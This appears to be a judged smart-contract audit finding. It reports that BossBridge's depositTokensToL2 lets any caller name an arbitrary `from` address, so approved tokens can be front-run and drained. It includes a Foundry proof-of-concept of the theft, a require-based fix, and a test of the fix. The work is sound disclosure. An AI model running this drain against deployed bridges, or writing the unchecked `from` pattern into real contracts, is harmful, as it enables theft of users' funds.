Submission Details
Severity: high
Valid

Users can have their allowed funds drained immediately after approval.

Summary

Any funds a user approves to the bridge can be front-run and drained to an attacker-controlled L2 address.

Vulnerability Details

A malicious actor can monitor the mempool and, on seeing an approval to the BossBridge contract, steal all of the approved tokens by calling depositTokensToL2(...) with the victim as `from` and themselves as the recipient.

PoC:

```solidity
function testDepositAllowanceExploit() public {
    vm.startPrank(user);
    token.mint(user_initial_amount);
    // approve the bridge for the maximum amount
    token.approve(address(tokenBridge), type(uint).max);
    vm.stopPrank();

    // attacker monitors the mempool, sees the approval, and front-runs with this transaction
    vm.prank(attacker);
    // expect the Deposit event to be emitted with the attacker as recipient
    vm.expectEmit(true, true, false, true);
    emit Deposit(user, attacker, user_initial_amount);
    tokenBridge.depositTokensToL2(user, attacker, user_initial_amount);

    // the user's funds are gone: the attacker has moved the user's balance to their own L2 address
    assertEq(token.balanceOf(user), 0);
}
```

Impact

High impact. This is a critical issue: anyone who grants the bridge contract an approval runs a very high risk of having their funds stolen.

Tools Used

Manual review
Foundry integration tests

Recommendations

The simplest way to deal with this issue is to restrict the caller of depositTokensToL2(...) to the token owner:

```solidity
require(msg.sender == from, "L1BossBridge: Caller must be token owner");
```
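As an added illustration (not the project's code and not part of the original submission), a minimal Foundry test of the recommended fix: a simplified bridge that carries the `msg.sender == from` check, with the PoC's front-running call now reverting. `HardenedBridge`, `MockToken` and the vault address are assumptions for this sketch.

```solidity
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {SafeERC20, IERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

// Constructed mock token with an open mint so the test is self-contained.
contract MockToken is ERC20 {
    constructor() ERC20("Mock", "MCK") {}
    function mint(address to, uint256 amount) external { _mint(to, amount); }
}

// Simplified bridge (assumed shape, not the project's code) with only the caller check added.
contract HardenedBridge {
    using SafeERC20 for IERC20;
    IERC20 public immutable token;
    address public immutable vault;
    event Deposit(address from, address to, uint256 amount);

    constructor(IERC20 _token, address _vault) { token = _token; vault = _vault; }

    function depositTokensToL2(address from, address l2Recipient, uint256 amount) external {
        // The fix: a caller may only spend the allowance it granted itself.
        require(msg.sender == from, "L1BossBridge: Caller must be token owner");
        token.safeTransferFrom(from, vault, amount);
        emit Deposit(from, l2Recipient, amount);
    }
}

contract HardenedBridgeTest is Test {
    MockToken token;
    HardenedBridge bridge;
    address user = makeAddr("user");
    address attacker = makeAddr("attacker");
    address vault = makeAddr("vault");
    uint256 constant AMOUNT = 1000e18;

    function setUp() public {
        token = new MockToken();
        bridge = new HardenedBridge(IERC20(address(token)), vault);
        token.mint(user, AMOUNT);
        vm.prank(user);
        token.approve(address(bridge), type(uint256).max); // unlimited approval, as in the PoC
    }

    // The front-running call from the PoC now reverts and the user keeps their balance.
    function testAttackerCannotSpendUsersAllowance() public {
        vm.prank(attacker);
        vm.expectRevert(bytes("L1BossBridge: Caller must be token owner"));
        bridge.depositTokensToL2(user, attacker, AMOUNT);
        assertEq(token.balanceOf(user), AMOUNT);
    }
}
```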
Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

depositTokensToL2(): arbitrary from address
